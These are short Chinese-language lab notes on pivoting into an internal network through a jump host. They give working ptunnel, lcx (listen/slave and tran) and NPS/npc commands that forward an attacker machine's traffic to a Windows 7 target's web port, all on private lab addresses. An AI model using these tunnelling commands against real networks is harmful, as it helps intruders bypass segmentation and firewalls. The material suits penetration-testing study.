攻击机网络配置
靶机网络配置
操作
攻击机192.168.217.128
ptunnel -p 192.168.217.135 -lp 2000 -da 192.168.131.129 -dp 80
http://192.168.217.128:5000 就是访问192.168.131.129:80
跳板机192.168.217.135,192.168.131.128
service apache2 restart
Iptables -A INPUT -p tcp -s 192.168.217.128 -j DROP
ptunnel
靶机192.168.131.129
lcx内网转发
攻击机192.168.131.130
跳板机192.168.131.132;192.168.217.136
靶机192.168.217.130
方案一
攻击机:
执行命令
lcx -listen 4444 5555
浏览器访问
http://192.168.131.130:5555 就是访问192.168.217.130:80
跳板机器
执行命令
lcx -slave 192.168.131.130 4444 192.168.217.130 80
目标机器
window7 sp1 旗舰版
ip:192.168.217.130
开放了80端口
方案二
攻击机:
http://192.168.131.132:5000 就是访问192.168.217.130:80
跳板机器
执行命令
lcx -tran 5000 192.168.217.130 80
目标机器
window7 sp1 旗舰版
ip:192.168.217.130
开放了80端口
NPS
环境设置:
攻击机:kali,一个网卡,nat模式,服务端NPS。
Ip地址:192.168.217.128
./npc
跳板机:kali,两个网卡,nat模式与仅主机模式,安装客户端NPS。
Ip地址1:192.168.131.128
Ip地址2:192.168.217.135
./npc -server=192.168.217.128:8024 -vkey=123456
靶机:windows7,仅主机模式,开通80端口,使用phpstudy,开通80端口,关闭防火墙。
Ip地址:192.168.131.129:80